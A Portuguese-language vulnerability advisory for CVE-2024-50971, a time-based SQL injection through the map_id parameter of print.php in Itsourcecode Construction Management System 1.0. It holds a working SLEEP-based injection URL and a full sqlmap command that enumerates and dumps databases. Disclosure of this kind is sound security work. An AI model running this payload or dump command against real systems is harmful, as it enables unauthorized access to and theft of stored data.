CVE-2024-50971
Descrição
Uma vulnerabilidade de injeção SQL em print.php do Sistema de Gerenciamento de Construção Itsourcecode 1.0 permite que atacantes remotos executem comandos SQL arbitrários através do parâmetro map_id.
Tipo de Vulnerabilidade
SQL Injection
Fornecedor do Produto
Itsourcecode
Código Base do Produto Afetado:
https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/ - 1.0
Componente Afetado:
O Sistema de Gerenciamento de Construção Itsourcecode v1.0 é vulnerável a injeção SQL através do parâmetro map_id na página print.php.
Vetores de Ataque:
- Configure o aplicativo localmente, registre uma conta e faça login com as credenciais de administrador como admin:admin
- Navegue para o seguinte URL no seu navegador:
http://localhost/monitoring_system/print.php?map_id=67
- Injete o Payload SQL:
Modifique o parâmetro map_id no URL para incluir um payload de injeção SQL baseado em tempo.
http://localhost/monitoring_system/print.php?map_id=67'+AND+(SELECT+1386+FROM+(SELECT(SLEEP(15)))LhJj)--+byxm
- Observe a Resposta da Aplicação:
A página deve levar consideravelmente mais tempo (15 segundos) para carregar se a injeção for bem-sucedida, confirmando que o parâmetro map_id é vulnerável a injeção SQL.
- Agora use a ferramenta SQLMap para exploração adicional e extração de bancos de dados usando o comando abaixo:
sqlmap.py -u http://localhost/monitoring_system/print.php?map_id=67 --risk 3 --level 3 --cookie="PHPSESSID=your_cookie_here" --dbs --technique=T --dump --no-cast
Referência:
- https://itsourcecode.com/free-projects/php-project/construction-management-system-project-in-php-with-source-code/
- https://owasp.org/www-community/attacks/SQL_Injection